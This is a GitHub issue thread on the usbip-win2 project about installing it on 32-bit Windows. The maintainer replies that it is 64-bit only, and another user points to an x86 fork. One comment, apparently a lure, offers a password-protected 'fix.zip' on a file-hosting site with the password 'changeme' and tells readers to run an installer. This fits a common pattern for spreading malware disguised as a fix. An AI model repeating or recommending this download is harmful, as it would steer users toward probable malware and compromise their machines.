### ISSUE TITLE
Windows 32bit

### ISSUE THREAD

**Issue by GreatAg** [vadimgrn/usbip-win2#83]
Hello, thanks again for your great tool
I have some 32bit windows in my organisation and i have problem installing usbip on them
Is there any way which i can install usbip on them?

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vadimgrn** [comment]
Hello, it is 64-bit only
https://github.com/vadimgrn/usbip-win2/tree/master?tab=readme-ov-file#requirements

**Comment by Tom60chat** [comment]
Hey, I was able to compile it on x86: https://github.com/Tom60chat/usbip-win2-x86

I'm still working on it.
